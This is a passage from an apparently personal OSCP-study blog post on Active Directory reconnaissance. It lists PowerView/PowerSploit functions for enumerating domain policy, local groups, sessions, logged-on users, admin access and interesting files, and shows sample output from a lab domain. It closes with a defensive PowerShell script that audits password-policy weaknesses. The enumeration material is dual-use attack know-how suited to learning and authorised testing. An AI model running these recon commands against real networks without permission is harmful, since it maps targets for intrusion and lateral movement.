Get-DomainGPOUserLocalGroupMapping      -   enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation
Get-DomainGPOComputerLocalGroupMapping  -   takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation
Get-DomainPolicy                        -   returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller

Computer Enumeration Functions

Get-NetLocalGroup                   -   enumerates the local groups on the local (or remote) machine
Get-NetLocalGroupMember             -   enumerates members of a specific local group on the local (or remote) machine
Get-NetShare                        -   returns open shares on the local (or a remote) machine
Get-NetLoggedon                     -   returns users logged on the local (or a remote) machine
Get-NetSession                      -   returns session information for the local (or a remote) machine
Get-RegLoggedOn                     -   returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys
Get-NetRDPSession                   -   returns remote desktop/session information for the local (or a remote) machine
Test-AdminAccess                    -   tests if the current user has administrative access to the local (or a remote) machine
Get-NetComputerSiteName             -   returns the AD site where the local (or a remote) machine resides
Get-WMIRegProxy                     -   enumerates the proxy server and WPAD contents for the current user
Get-WMIRegLastLoggedOn              -   returns the last user who logged onto the local (or a remote) machine
Get-WMIRegCachedRDPConnection       -   returns information about RDP connections outgoing from the local (or remote) machine
Get-WMIRegMountedDrive              -   returns information about saved network mounted drives for the local (or remote) machine
Get-WMIProcess                      -   returns a list of processes and their owners on the local or remote machine
Find-InterestingFile                -   searches for files on the given path that match a series of specified criteria


Execution examples:

PS C:\Users\worker2\Documents\PowerSploit-3.0.0\Recon> Get-DomainSID
S-1-5-21-2048228633-4105951457-1013245227
PS C:\Users\worker2\Documents\PowerSploit-3.0.0\Recon> Get-DomainPolicy
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.String[]}
SystemAccess : @{MinimumPasswordAge=1; MaximumPasswordAge=42; LockoutBadCount=0; PasswordComplexity=1;
RequireLogonToChangePassword=0; LSAAnonymousNameLookup=0; ForceLogoffWhenHourExpire=0;
PasswordHistorySize=24; ClearTextPassword=0; MinimumPasswordLength=7}
Version : @{Revision=1; signature="$CHICAGO$"}
KerberosPolicy : @{MaxTicketAge=10; MaxServiceAge=600; MaxClockSkew=5; MaxRenewAge=7;
TicketValidateClient=1}
Unicode : @{Unicode=yes}
PS C:\Users\worker2\Documents\PowerSploit-3.0.0\Recon> Get-UserProperty
Name
----
accountexpires
admincount
adspath
badpasswordtime
badpwdcount
cn
codepage
countrycode
description
distinguishedname
dscorepropagationdata
instancetype
iscriticalsystemobject
lastlogoff
lastlogon
lastlogontimestamp
logoncount
memberof
name
objectcategory
objectclass
objectguid
objectsid
primarygroupid
pwdlastset
samaccountname
samaccounttype
useraccountcontrol
usnchanged
usncreated
whenchanged
whencreated
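
Both tools above expose the same domain password policy, the ActiveDirectory module through Get-ADDefaultDomainPasswordPolicy (typed properties) and PowerView through Get-DomainPolicy (the GPO's [System Access] section as string values). The following audit is an added example, not code from this post, RSAT or PowerView: it normalises either object into one shape and flags weak settings. The helper names, the baseline thresholds and the constructed sample object are assumptions; fed the values this post's own output shows, it flags the LockoutThreshold of 0 and the MinPasswordLength of 7.

```powershell
# Added example (not from the original post, RSAT or PowerView): audit the
# password policy returned by Get-ADDefaultDomainPasswordPolicy or by
# PowerView's Get-DomainPolicy. Baseline thresholds are assumptions.

function ConvertTo-PolicySummary {
    param([Parameter(Mandatory)] $Policy)
    # PowerView returns the GPO [System Access] section as .SystemAccess with
    # string values; the AD module returns typed properties. Map both to one shape.
    if ($null -ne $Policy.SystemAccess) {
        $sa = $Policy.SystemAccess
        return [pscustomobject]@{
            Source               = 'PowerView Get-DomainPolicy'
            MinPasswordLength    = [int]$sa.MinimumPasswordLength
            LockoutThreshold     = [int]$sa.LockoutBadCount
            ComplexityEnabled    = ([int]$sa.PasswordComplexity -eq 1)
            PasswordHistoryCount = [int]$sa.PasswordHistorySize
            MaxPasswordAgeDays   = [int]$sa.MaximumPasswordAge   # -1 in the GPO template = never expires
            MinPasswordAgeDays   = [int]$sa.MinimumPasswordAge
            ReversibleEncryption = ([int]$sa.ClearTextPassword -eq 1)
        }
    }
    [pscustomobject]@{
        Source               = 'ActiveDirectory module'
        MinPasswordLength    = [int]$Policy.MinPasswordLength
        LockoutThreshold     = [int]$Policy.LockoutThreshold
        ComplexityEnabled    = [bool]$Policy.ComplexityEnabled
        PasswordHistoryCount = [int]$Policy.PasswordHistoryCount
        MaxPasswordAgeDays   = [int]([timespan]$Policy.MaxPasswordAge).TotalDays  # 0 = never expires
        MinPasswordAgeDays   = [int]([timespan]$Policy.MinPasswordAge).TotalDays
        ReversibleEncryption = [bool]$Policy.ReversibleEncryptionEnabled
    }
}

function Test-PasswordPolicy {
    param(
        [Parameter(Mandatory)] $Policy,
        [int]$MinLength  = 14,   # assumed baseline values, not Microsoft defaults
        [int]$MaxLockout = 10,
        [int]$MinHistory = 24
    )
    $p = ConvertTo-PolicySummary -Policy $Policy
    $findings = @()
    if ($p.LockoutThreshold -eq 0) {
        $findings += 'LockoutThreshold 0: accounts never lock out, so online password guessing is unlimited'
    } elseif ($p.LockoutThreshold -gt $MaxLockout) {
        $findings += "LockoutThreshold $($p.LockoutThreshold) is above the baseline of $MaxLockout"
    }
    if ($p.MinPasswordLength -lt $MinLength) {
        $findings += "MinPasswordLength $($p.MinPasswordLength) is below the baseline of $MinLength"
    }
    if (-not $p.ComplexityEnabled) { $findings += 'Password complexity is disabled' }
    if ($p.ReversibleEncryption)   { $findings += 'Reversible encryption is enabled (passwords recoverable in clear)' }
    if ($p.PasswordHistoryCount -lt $MinHistory) {
        $findings += "PasswordHistoryCount $($p.PasswordHistoryCount) is below the baseline of $MinHistory"
    }
    if ($p.MaxPasswordAgeDays -le 0) { $findings += 'MaxPasswordAge: passwords never expire' }
    if ($p.MinPasswordAgeDays -lt 1) { $findings += 'MinPasswordAge 0: password history can be cycled through immediately' }
    [pscustomobject]@{ Source = $p.Source; Pass = ($findings.Count -eq 0); Findings = $findings }
}

# Constructed sample carrying the values this post's output shows, so the
# check runs without a domain. In a live session pass the real object:
#   Test-PasswordPolicy -Policy (Get-ADDefaultDomainPasswordPolicy)
#   Test-PasswordPolicy -Policy (Get-DomainPolicy)
$sample = [pscustomobject]@{
    ComplexityEnabled = $true;  LockoutThreshold = 0;  MinPasswordLength = 7
    MaxPasswordAge = [timespan]'42.00:00:00';  MinPasswordAge = [timespan]'1.00:00:00'
    PasswordHistoryCount = 24;  ReversibleEncryptionEnabled = $false
}
Test-PasswordPolicy -Policy $sample | Select-Object -ExpandProperty Findings
```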

 And that is all for this Active Directory reconnaissance entry. I hope you enjoyed my seventh Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.


with kind regards, f0ns1
